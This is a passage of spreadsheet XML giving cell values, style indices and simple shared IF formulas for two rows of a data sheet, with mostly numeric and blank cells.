        <v>0.0</v>
      </c>
      <c r="AR78" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS78" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT78" s="100" t="str">
        <f t="shared" si="149"/>
        <v>-</v>
      </c>
      <c r="AU78" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV78" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW78" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX78" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY78" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ78" s="100">
        <v>0.0</v>
      </c>
      <c r="BA78" s="102">
        <v>289577.0</v>
      </c>
      <c r="BB78" s="102">
        <v>0.0</v>
      </c>
      <c r="BC78" s="102">
        <v>0.0</v>
      </c>
      <c r="BD78" s="102">
        <v>0.0</v>
      </c>
      <c r="BE78" s="102">
        <v>0.0</v>
      </c>
      <c r="BF78" s="102">
        <v>0.0</v>
      </c>
      <c r="BG78" s="102">
        <v>0.0</v>
      </c>
      <c r="BH78" s="102">
        <v>0.0</v>
      </c>
      <c r="BI78" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ78" s="102">
        <v>0.0</v>
      </c>
      <c r="BK78" s="102">
        <v>0.0</v>
      </c>
      <c r="BL78" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM78" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN78" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO78" s="103">
        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="BP78" s="103">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BQ78" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR78" s="103">
        <f t="shared" si="118"/>
        <v>0</v>
      </c>
      <c r="BS78" s="103">
        <f t="shared" si="119"/>
        <v>0</v>
      </c>
      <c r="BT78" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU78" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV78" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW78" s="104">
        <v>2019348.0</v>
      </c>
      <c r="BX78" s="104">
        <v>1.0</v>
      </c>
      <c r="BY78" s="104">
        <v>63.0</v>
      </c>
      <c r="BZ78" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA78" s="104">
        <v>2019348.0</v>
      </c>
      <c r="CB78" s="104">
        <v>1.0</v>
      </c>
      <c r="CC78" s="104">
        <v>63.0</v>
      </c>
      <c r="CD78" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE78" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF78" s="104" t="str">
        <f t="shared" ref="CF78:CF95" si="153">IF(CD78="-",CE78,CD78)</f>
        <v>-</v>
      </c>
      <c r="CG78" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH78" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI78" s="104">
        <v>2019348.0</v>
      </c>
      <c r="CJ78" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK78" s="104">
        <v>1.0</v>
      </c>
      <c r="CL78" s="104">
        <v>63.0</v>
      </c>
      <c r="CM78" s="105">
        <v>289328.0</v>
      </c>
      <c r="CN78" s="105">
        <v>63.0</v>
      </c>
      <c r="CO78" s="105">
        <v>63.0</v>
      </c>
      <c r="CP78" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ78" s="105">
        <v>63.0</v>
      </c>
      <c r="CR78" s="105">
        <v>63.0</v>
      </c>
      <c r="CS78" s="105">
        <v>1.0</v>
      </c>
      <c r="CT78" s="105">
        <v>0.0</v>
      </c>
      <c r="CU78" s="105">
        <v>1.0</v>
      </c>
      <c r="CV78" s="105">
        <v>1.0</v>
      </c>
      <c r="CW78" s="105">
        <v>63.0</v>
      </c>
      <c r="CX78" s="105">
        <v>63.0</v>
      </c>
      <c r="CY78" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ78" s="105">
        <v>63.0</v>
      </c>
      <c r="DA78" s="105">
        <v>63.0</v>
      </c>
      <c r="DB78" s="106">
        <f t="shared" si="122"/>
        <v>63</v>
      </c>
      <c r="DC78" s="106">
        <f t="shared" si="123"/>
        <v>63</v>
      </c>
      <c r="DD78" s="106">
        <f t="shared" si="124"/>
        <v>1</v>
      </c>
      <c r="DE78" s="106">
        <f t="shared" si="125"/>
        <v>63</v>
      </c>
      <c r="DF78" s="106">
        <f t="shared" si="126"/>
        <v>63</v>
      </c>
      <c r="DG78" s="106">
        <f t="shared" si="20"/>
        <v>1</v>
      </c>
      <c r="DH78" s="106">
        <f t="shared" si="127"/>
        <v>63</v>
      </c>
      <c r="DI78" s="106">
        <f t="shared" si="128"/>
        <v>63</v>
      </c>
      <c r="DJ78" s="106">
        <f t="shared" si="129"/>
        <v>1</v>
      </c>
      <c r="DK78" s="107">
        <f t="shared" si="104"/>
        <v>1</v>
      </c>
      <c r="DL78" s="106">
        <f t="shared" si="105"/>
        <v>1</v>
      </c>
      <c r="DM78" s="108">
        <v>2019348.0</v>
      </c>
      <c r="DN78" s="108">
        <v>1.0</v>
      </c>
      <c r="DO78" s="108">
        <v>63.0</v>
      </c>
      <c r="DP78" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ78" s="108">
        <v>2019348.0</v>
      </c>
      <c r="DR78" s="108">
        <v>1.0</v>
      </c>
      <c r="DS78" s="108">
        <v>63.0</v>
      </c>
      <c r="DT78" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU78" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV78" s="108" t="str">
        <f t="shared" ref="DV78:DV106" si="154">IF(DT78="-",DU78,DT78)</f>
        <v>-</v>
      </c>
      <c r="DW78" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX78" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY78" s="108">
        <v>2019348.0</v>
      </c>
      <c r="DZ78" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA78" s="108">
        <v>1.0</v>
      </c>
      <c r="EB78" s="108">
        <v>63.0</v>
      </c>
      <c r="EC78" s="109">
        <v>163918.0</v>
      </c>
      <c r="ED78" s="109">
        <v>63.0</v>
      </c>
      <c r="EE78" s="109">
        <v>63.0</v>
      </c>
      <c r="EF78" s="109">
        <v>0.0</v>
      </c>
      <c r="EG78" s="109">
        <v>63.0</v>
      </c>
      <c r="EH78" s="109">
        <v>63.0</v>
      </c>
      <c r="EI78" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ78" s="109">
        <v>0.0</v>
      </c>
      <c r="EK78" s="109">
        <v>1.0</v>
      </c>
      <c r="EL78" s="109">
        <v>1.0</v>
      </c>
      <c r="EM78" s="109">
        <v>63.0</v>
      </c>
      <c r="EN78" s="109">
        <v>63.0</v>
      </c>
      <c r="EO78" s="109">
        <v>0.0</v>
      </c>
      <c r="EP78" s="109">
        <v>63.0</v>
      </c>
      <c r="EQ78" s="109">
        <v>63.0</v>
      </c>
      <c r="ER78" s="110">
        <f t="shared" si="130"/>
        <v>63</v>
      </c>
      <c r="ES78" s="110">
        <f t="shared" si="131"/>
        <v>63</v>
      </c>
      <c r="ET78" s="110">
        <f t="shared" si="132"/>
        <v>1</v>
      </c>
      <c r="EU78" s="110">
        <f t="shared" si="133"/>
        <v>63</v>
      </c>
      <c r="EV78" s="110">
        <f t="shared" si="134"/>
        <v>63</v>
      </c>
      <c r="EW78" s="110">
        <f t="shared" si="135"/>
        <v>1</v>
      </c>
      <c r="EX78" s="110">
        <f t="shared" si="136"/>
        <v>63</v>
      </c>
      <c r="EY78" s="110">
        <f t="shared" si="137"/>
        <v>63</v>
      </c>
      <c r="EZ78" s="110">
        <f t="shared" si="138"/>
        <v>1</v>
      </c>
      <c r="FA78" s="110">
        <f t="shared" si="106"/>
        <v>1</v>
      </c>
      <c r="FB78" s="110">
        <f t="shared" si="107"/>
        <v>1</v>
      </c>
      <c r="FC78" s="111" t="s">
        <v>1468</v>
      </c>
      <c r="FD78" s="111">
        <v>3.0</v>
      </c>
      <c r="FE78" s="111">
        <v>195.0</v>
      </c>
      <c r="FF78" s="101" t="s">
        <v>423</v>
      </c>
      <c r="FG78" s="111">
        <v>2019348.0</v>
      </c>
      <c r="FH78" s="111">
        <v>1.0</v>
      </c>
      <c r="FI78" s="111">
        <v>63.0</v>
      </c>
      <c r="FJ78" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FK78" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL78" s="111" t="str">
        <f t="shared" ref="FL78:FL125" si="155">IF(FJ78="-",FK78,FJ78)</f>
        <v>2002749, 2002752</v>
      </c>
      <c r="FM78" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN78" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FO78" s="111">
        <v>2019348.0</v>
      </c>
      <c r="FP78" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ78" s="111">
        <v>1.0</v>
      </c>
      <c r="FR78" s="111">
        <v>63.0</v>
      </c>
      <c r="FS78" s="112">
        <v>289328.0</v>
      </c>
      <c r="FT78" s="112">
        <v>183.0</v>
      </c>
      <c r="FU78" s="112">
        <v>184.0</v>
      </c>
      <c r="FV78" s="112">
        <v>0.0</v>
      </c>
      <c r="FW78" s="112">
        <v>195.0</v>
      </c>
      <c r="FX78" s="112">
        <v>195.0</v>
      </c>
      <c r="FY78" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ78" s="112">
        <v>0.0</v>
      </c>
      <c r="GA78" s="112">
        <v>1.0</v>
      </c>
      <c r="GB78" s="112">
        <v>1.0</v>
      </c>
      <c r="GC78" s="112">
        <v>63.0</v>
      </c>
      <c r="GD78" s="112">
        <v>63.0</v>
      </c>
      <c r="GE78" s="112">
        <v>0.0</v>
      </c>
      <c r="GF78" s="112">
        <v>63.0</v>
      </c>
      <c r="GG78" s="112">
        <v>63.0</v>
      </c>
      <c r="GH78" s="113">
        <f t="shared" si="139"/>
        <v>183</v>
      </c>
      <c r="GI78" s="113">
        <f t="shared" si="140"/>
        <v>63</v>
      </c>
      <c r="GJ78" s="113">
        <f t="shared" si="141"/>
        <v>1</v>
      </c>
      <c r="GK78" s="113">
        <f t="shared" si="142"/>
        <v>184</v>
      </c>
      <c r="GL78" s="113">
        <f t="shared" si="143"/>
        <v>63</v>
      </c>
      <c r="GM78" s="113">
        <f t="shared" si="144"/>
        <v>1</v>
      </c>
      <c r="GN78" s="113">
        <f t="shared" si="145"/>
        <v>195</v>
      </c>
      <c r="GO78" s="113">
        <f t="shared" si="146"/>
        <v>63</v>
      </c>
      <c r="GP78" s="113">
        <f t="shared" si="147"/>
        <v>1</v>
      </c>
      <c r="GQ78" s="114">
        <f t="shared" si="108"/>
        <v>1</v>
      </c>
      <c r="GR78" s="113">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="GS78" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT78" s="94" t="s">
        <v>1469</v>
      </c>
      <c r="GU78" s="116">
        <v>1.07347977E8</v>
      </c>
      <c r="GV78" s="116">
        <v>1.0</v>
      </c>
      <c r="GW78" s="116">
        <v>289314.0</v>
      </c>
      <c r="GX78" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY78" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ78" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA78" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB78" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC78" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD78" s="131">
        <v>1.07347977E8</v>
      </c>
      <c r="HE78" s="131">
        <v>1.07347977E8</v>
      </c>
      <c r="HF78" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG78" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH78" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI78" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ78" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK78" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL78" s="93">
        <v>141737.0</v>
      </c>
      <c r="HM78" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN78" s="93">
        <v>1.0</v>
      </c>
      <c r="HO78" s="93">
        <v>0.0</v>
      </c>
      <c r="HP78" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ78" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR78" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS78" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT78" s="139"/>
      <c r="HU78" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV78" s="119">
        <v>9999.0</v>
      </c>
      <c r="HW78" s="119">
        <v>1.0</v>
      </c>
      <c r="HX78" s="119">
        <v>288572.0</v>
      </c>
      <c r="HY78" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ78" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA78" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB78" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC78" s="120" t="s">
        <v>12</v>
      </c>
      <c r="ID78" s="120">
        <v>9999.0</v>
      </c>
      <c r="IE78" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF78" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG78" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH78" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II78" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ78" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK78" s="99">
        <v>163443.0</v>
      </c>
      <c r="IL78" s="99">
        <v>1.0</v>
      </c>
      <c r="IM78" s="121">
        <f t="shared" si="97"/>
        <v>1</v>
      </c>
      <c r="IN78" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO78" s="98">
        <v>1.0</v>
      </c>
      <c r="IP78" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ78" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR78" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS78" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT78" s="127"/>
      <c r="IU78" s="127"/>
      <c r="IV78" s="127"/>
      <c r="IW78" s="127"/>
      <c r="IX78" s="127"/>
      <c r="IY78" s="127"/>
      <c r="IZ78" s="127"/>
      <c r="JA78" s="127"/>
      <c r="JB78" s="127"/>
      <c r="JC78" s="127"/>
      <c r="JD78" s="127"/>
      <c r="JE78" s="127"/>
      <c r="JF78" s="127"/>
      <c r="JG78" s="127"/>
      <c r="JH78" s="127"/>
      <c r="JI78" s="127"/>
      <c r="JJ78" s="127"/>
      <c r="JK78" s="127"/>
      <c r="JL78" s="127"/>
      <c r="JM78" s="127"/>
      <c r="JN78" s="127"/>
      <c r="JO78" s="127"/>
      <c r="JP78" s="127"/>
      <c r="JQ78" s="127"/>
      <c r="JR78" s="127"/>
      <c r="JS78" s="127"/>
      <c r="JT78" s="127"/>
      <c r="JU78" s="127"/>
      <c r="JV78" s="127"/>
      <c r="JW78" s="127"/>
      <c r="JX78" s="127"/>
      <c r="JY78" s="127"/>
      <c r="JZ78" s="127"/>
      <c r="KA78" s="127"/>
      <c r="KB78" s="127"/>
      <c r="KC78" s="127"/>
      <c r="KD78" s="127"/>
      <c r="KE78" s="127"/>
      <c r="KF78" s="127"/>
      <c r="KG78" s="127"/>
      <c r="KH78" s="127"/>
      <c r="KI78" s="127"/>
      <c r="KJ78" s="127"/>
      <c r="KK78" s="127"/>
      <c r="KL78" s="127"/>
      <c r="KM78" s="127"/>
      <c r="KN78" s="127"/>
      <c r="KO78" s="127"/>
      <c r="KP78" s="127"/>
      <c r="KQ78" s="127"/>
      <c r="KR78" s="127"/>
      <c r="KS78" s="127"/>
      <c r="KT78" s="127"/>
      <c r="KU78" s="127"/>
      <c r="KV78" s="127"/>
      <c r="KW78" s="127"/>
      <c r="KX78" s="127"/>
      <c r="KY78" s="127"/>
      <c r="KZ78" s="127"/>
      <c r="LA78" s="127"/>
      <c r="LB78" s="127"/>
      <c r="LC78" s="127"/>
      <c r="LD78" s="127"/>
      <c r="LE78" s="127"/>
      <c r="LF78" s="127"/>
      <c r="LG78" s="127"/>
      <c r="LH78" s="127"/>
      <c r="LI78" s="127"/>
      <c r="LJ78" s="127"/>
      <c r="LK78" s="127"/>
      <c r="LL78" s="127"/>
      <c r="LM78" s="127"/>
      <c r="LN78" s="127"/>
      <c r="LO78" s="127"/>
      <c r="LP78" s="127"/>
      <c r="LQ78" s="127"/>
      <c r="LR78" s="127"/>
      <c r="LS78" s="127"/>
      <c r="LT78" s="127"/>
      <c r="LU78" s="127"/>
      <c r="LV78" s="127"/>
      <c r="LW78" s="127"/>
      <c r="LX78" s="127"/>
      <c r="LY78" s="127"/>
      <c r="LZ78" s="127"/>
      <c r="MA78" s="127"/>
      <c r="MB78" s="127"/>
      <c r="MC78" s="127"/>
      <c r="MD78" s="127"/>
      <c r="ME78" s="127"/>
      <c r="MF78" s="127"/>
      <c r="MG78" s="127"/>
      <c r="MH78" s="127"/>
      <c r="MI78" s="127"/>
      <c r="MJ78" s="127"/>
      <c r="MK78" s="127"/>
      <c r="ML78" s="127"/>
      <c r="MM78" s="127"/>
      <c r="MN78" s="127"/>
      <c r="MO78" s="127"/>
      <c r="MP78" s="127"/>
      <c r="MQ78" s="127"/>
      <c r="MR78" s="127"/>
      <c r="MS78" s="127"/>
      <c r="MT78" s="127"/>
      <c r="MU78" s="127"/>
      <c r="MV78" s="127"/>
      <c r="MW78" s="127"/>
      <c r="MX78" s="127"/>
      <c r="MY78" s="127"/>
      <c r="MZ78" s="127"/>
      <c r="NA78" s="127"/>
      <c r="NB78" s="127"/>
      <c r="NC78" s="127"/>
      <c r="ND78" s="127"/>
      <c r="NE78" s="127"/>
      <c r="NF78" s="127"/>
      <c r="NG78" s="127"/>
      <c r="NH78" s="127"/>
      <c r="NI78" s="127"/>
      <c r="NJ78" s="127"/>
      <c r="NK78" s="127"/>
      <c r="NL78" s="127"/>
      <c r="NM78" s="127"/>
      <c r="NN78" s="127"/>
      <c r="NO78" s="127"/>
      <c r="NP78" s="127"/>
      <c r="NQ78" s="127"/>
      <c r="NR78" s="127"/>
      <c r="NS78" s="127"/>
      <c r="NT78" s="127"/>
      <c r="NU78" s="127"/>
      <c r="NV78" s="127"/>
      <c r="NW78" s="127"/>
      <c r="NX78" s="127"/>
      <c r="NY78" s="127"/>
    </row>
    <row r="79" ht="153.75" customHeight="1">
      <c r="B79" s="89" t="s">
        <v>1373</v>
      </c>
      <c r="C79" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D79" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E79" s="90" t="s">
        <v>1411</v>
      </c>
      <c r="F79" s="90" t="s">
        <v>1412</v>
      </c>
      <c r="G79" s="91" t="s">
        <v>1461</v>
      </c>
      <c r="H79" s="90" t="s">
        <v>1462</v>
      </c>
      <c r="I79" s="92" t="s">
        <v>1470</v>
      </c>
      <c r="J79" s="92" t="s">
        <v>1471</v>
      </c>
      <c r="K79" s="92" t="s">
        <v>1472</v>
      </c>
      <c r="L79" s="93" t="s">
        <v>474</v>
      </c>
      <c r="M79" s="93">
        <v>1.0</v>
      </c>
      <c r="N79" s="93">
        <v>1.0</v>
      </c>
      <c r="O79" s="93">
        <v>0.0</v>
      </c>
      <c r="P79" s="93">
        <v>1.0</v>
      </c>
      <c r="Q79" s="93">
        <v>1.0</v>
      </c>
      <c r="R79" s="93">
        <v>1.0</v>
      </c>
      <c r="S79" s="93">
        <v>0.0</v>
      </c>
      <c r="T79" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U79" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V79" s="96" t="s">
        <v>12</v>
      </c>
      <c r="W79" s="96" t="s">
        <v>1473</v>
      </c>
      <c r="X79" s="97" t="s">
        <v>1474</v>
      </c>
      <c r="Y79" s="126" t="s">
        <v>1475</v>
      </c>
      <c r="Z79" s="126" t="s">
        <v>1476</v>
      </c>
      <c r="AA79" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB79" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC79" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD79" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE79" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF79" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG79" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH79" s="99" t="s">
        <v>1440</v>
      </c>
      <c r="AI79" s="99" t="s">
        <v>481</v>
      </c>
      <c r="AJ79" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK79" s="100">
        <v>1917.0</v>
      </c>
      <c r="AL79" s="100">
        <v>1.0</v>
      </c>
      <c r="AM79" s="100">
        <v>8.0</v>
      </c>
      <c r="AN79" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO79" s="100">
        <v>1917.0</v>
      </c>
      <c r="AP79" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ79" s="100">
        <v>8.0</v>
      </c>
      <c r="AR79" s="100">
        <v>1917.0</v>
      </c>
      <c r="AS79" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT79" s="100">
        <f t="shared" si="149"/>
        <v>1917</v>
      </c>
      <c r="AU79" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV79" s="100">
        <v>1917.0</v>
      </c>
      <c r="AW79" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX79" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY79" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ79" s="100">
        <v>0.0</v>
      </c>
      <c r="BA79" s="102">
        <v>21711.0</v>
      </c>
      <c r="BB79" s="102">
        <v>2.0</v>
      </c>
      <c r="BC79" s="102">
        <v>8.0</v>
      </c>
      <c r="BD79" s="102">
        <v>8.0</v>
      </c>
      <c r="BE79" s="102">
        <v>0.0</v>
      </c>
      <c r="BF79" s="102">
        <v>0.0</v>
      </c>
      <c r="BG79" s="102">
        <v>0.0</v>
      </c>
      <c r="BH79" s="102">
        <v>0.0</v>
      </c>
      <c r="BI79" s="102">
        <v>2.0</v>
      </c>
      <c r="BJ79" s="102">
        <v>8.0</v>
      </c>
      <c r="BK79" s="102">
        <v>8.0</v>
      </c>
      <c r="BL79" s="103">
        <f t="shared" si="112"/>
        <v>2</v>
      </c>
      <c r="BM79" s="103">
        <f t="shared" si="113"/>
        <v>2</v>
      </c>
      <c r="BN79" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO79" s="103">
        <f t="shared" si="115"/>
        <v>8</v>
      </c>
      <c r="BP79" s="103">
        <f t="shared" si="116"/>
        <v>8</v>
      </c>
      <c r="BQ79" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR79" s="103">
        <f t="shared" si="118"/>
        <v>8</v>
      </c>
      <c r="BS79" s="103">
        <f t="shared" si="119"/>
        <v>8</v>
      </c>
      <c r="BT79" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU79" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV79" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW79" s="104">
        <v>1917.0</v>
      </c>
      <c r="BX79" s="104">
        <v>1.0</v>
      </c>
      <c r="BY79" s="104">
        <v>8.0</v>
      </c>
      <c r="BZ79" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA79" s="104">
        <v>1917.0</v>
      </c>
      <c r="CB79" s="104">
        <v>1.0</v>
      </c>
      <c r="CC79" s="104">
        <v>8.0</v>
      </c>
      <c r="CD79" s="104">
        <v>1917.0</v>
      </c>
      <c r="CE79" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF79" s="104">
        <f t="shared" si="153"/>
        <v>1917</v>
      </c>
      <c r="CG79" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH79" s="104">
        <v>1917.0</v>
      </c>
      <c r="CI79" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ79" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK79" s="104">
        <v>0.0</v>
      </c>
      <c r="CL79" s="104">
        <v>0.0</v>
      </c>
      <c r="CM79" s="105">
        <v>2.0</v>
      </c>
      <c r="CN79" s="105">
        <v>2.0</v>
      </c>
      <c r="CO79" s="105">
        <v>8.0</v>
      </c>
      <c r="CP79" s="105">
        <v>8.0</v>
      </c>
      <c r="CQ79" s="105">
        <v>0.0</v>
      </c>
      <c r="CR79" s="105">
        <v>8.0</v>
      </c>
      <c r="CS79" s="105">
        <v>0.0</v>
      </c>
      <c r="CT79" s="105">
        <v>0.0</v>
      </c>
      <c r="CU79" s="105">
        <v>0.0</v>
      </c>
      <c r="CV79" s="105">
        <v>0.0</v>
      </c>
      <c r="CW79" s="105">
        <v>2.0</v>
      </c>
      <c r="CX79" s="105">
        <v>8.0</v>
      </c>
      <c r="CY79" s="105">
        <v>8.0</v>
      </c>
      <c r="CZ79" s="105">
        <v>0.0</v>
      </c>
      <c r="DA79" s="105">
        <v>8.0</v>
      </c>
      <c r="DB79" s="106">
        <f t="shared" si="122"/>
        <v>2</v>
      </c>
      <c r="DC79" s="106">
        <f t="shared" si="123"/>
        <v>2</v>
      </c>
      <c r="DD79" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE79" s="106">
        <f t="shared" si="125"/>
        <v>8</v>
      </c>
      <c r="DF79" s="106">
        <f t="shared" si="126"/>
        <v>8</v>
      </c>
      <c r="DG79" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH79" s="106">
        <f t="shared" si="127"/>
        <v>8</v>
      </c>
      <c r="DI79" s="106">
        <f t="shared" si="128"/>
        <v>8</v>
      </c>
      <c r="DJ79" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK79" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL79" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM79" s="108">
        <v>1917.0</v>
      </c>
      <c r="DN79" s="108">
        <v>1.0</v>
      </c>
      <c r="DO79" s="108">
        <v>8.0</v>
      </c>
      <c r="DP79" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ79" s="108">
        <v>1917.0</v>
      </c>
      <c r="DR79" s="108">
        <v>1.0</v>
      </c>
      <c r="DS79" s="108">
        <v>8.0</v>
      </c>
      <c r="DT79" s="108">
        <v>1917.0</v>
      </c>
      <c r="DU79" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV79" s="108">
        <f t="shared" si="154"/>
        <v>1917</v>
      </c>
      <c r="DW79" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX79" s="108">
        <v>1917.0</v>
      </c>
      <c r="DY79" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ79" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA79" s="108">
        <v>0.0</v>
      </c>
      <c r="EB79" s="108">
        <v>0.0</v>
      </c>
      <c r="EC79" s="109">
        <v>21711.0</v>
      </c>
      <c r="ED79" s="109">
        <v>2.0</v>
      </c>
      <c r="EE79" s="109">
        <v>8.0</v>
      </c>
      <c r="EF79" s="109">
        <v>8.0</v>
      </c>
      <c r="EG79" s="109">
        <v>0.0</v>
      </c>
      <c r="EH79" s="109">
        <v>8.0</v>
      </c>
      <c r="EI79" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ79" s="109">
        <v>0.0</v>
      </c>
      <c r="EK79" s="109">
        <v>0.0</v>
      </c>
      <c r="EL79" s="109">
        <v>0.0</v>
      </c>
      <c r="EM79" s="109">
        <v>2.0</v>
      </c>
      <c r="EN79" s="109">
        <v>8.0</v>
      </c>
      <c r="EO79" s="109">
        <v>8.0</v>
      </c>
      <c r="EP79" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ79" s="109">
        <v>8.0</v>
      </c>
      <c r="ER79" s="110">
        <f t="shared" si="130"/>
        <v>2</v>
      </c>
      <c r="ES79" s="110">
        <f t="shared" si="131"/>
        <v>2</v>
      </c>
      <c r="ET79" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU79" s="110">
        <f t="shared" si="133"/>
        <v>8</v>
      </c>
      <c r="EV79" s="110">
        <f t="shared" si="134"/>
        <v>8</v>
      </c>
      <c r="EW79" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX79" s="110">
        <f t="shared" si="136"/>
        <v>8</v>
      </c>
      <c r="EY79" s="110">
        <f t="shared" si="137"/>
        <v>8</v>
      </c>
      <c r="EZ79" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA79" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB79" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC79" s="111" t="s">
        <v>1477</v>
      </c>
      <c r="FD79" s="111">
        <v>5.0</v>
      </c>
      <c r="FE79" s="111">
        <v>21876.0</v>
      </c>
      <c r="FF79" s="101" t="s">
        <v>385</v>
      </c>
